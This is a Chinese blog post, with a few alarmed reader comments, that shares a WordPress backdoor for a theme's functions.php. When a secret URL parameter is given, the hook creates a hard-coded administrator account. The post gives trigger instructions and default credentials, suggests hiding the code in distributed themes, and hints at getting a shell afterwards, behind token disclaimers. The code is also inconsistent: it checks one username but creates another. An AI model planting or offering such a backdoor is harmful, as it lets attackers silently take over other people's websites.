当前位置:首页 > WordPress教程 > 正文

一段代码,让你的博客从此毫无毫安全感-WP后门代码

以前大家是不是总是听说过程序后门啦,网站后门啦之类的。

door

其实只要在你的主题里添加一段代码,你的博客账号,就从此呵呵了。想想太邪恶了,首先我先声明下,我分享的绝无,不信你们自己看,我没那么邪恶的。

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'ihuan', 'me' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

这么一段代码加入主题的functions.php中,对方的网站就无处藏身了。

然后,你再加点别的,提示下对方正在用你的主题,在functions.php里或其他地方再加个链接触发就好了。然后,你只需要……就可以呵呵呵了!太邪恶了……

但是小幻不建议这么干,请自觉使用!

使用方法:打开http://目标.com/?backdoor=ihuan 如果在二级目录就加个二级。

然后,你就可以使用你的密码来登陆他的后台了,正常登陆即可,管理员权限,也就是说,你甚至可以shell。具体不多说,自己百度。没办法,WP太强大了!!!超简单拿权。

我这里默认设置的账号密码是 账号:ihuan 密码:me

就这样了,别做坏事!!!!!

如果需要详细的各种功能源码(触发、记录等),请联系我,*** 完了完了,我又要做坏事

但是删数据库、放黑页不是我们这些“三好学生”该干的。请收好您的好奇心!

标签:
上一篇: 下一篇:

21 条评论

评论加载中...
  1. 说真的,这段代码真心很邪恶! :bobo_weiqu:

    2017年2月17日 23:26 评论
  2. 12楼
    来自天朝的朋友 谷歌浏览器 Windows 7
    阳光不收费  

    这篇文章让我们这些新手对互联网充满恐惧

    2016年5月15日 16:32 评论
  3. 11楼
    来自天朝的朋友 谷歌浏览器 Windows 7
    慕若曦  

    然而好恐怖……

    2016年5月1日 22:56 评论

发表评论

不理你。不要啊!吃饭。吃惊。吃西瓜。飞吻!恭喜!Hi纠结!膜拜!OK抛媚眼。泡泡糖。抛钱。忍!生闷气!调皮。偷看。委屈。献花。疑问?抓狂!

小提示:Ctrl+Enter快速提交助您一臂之力~
加载中……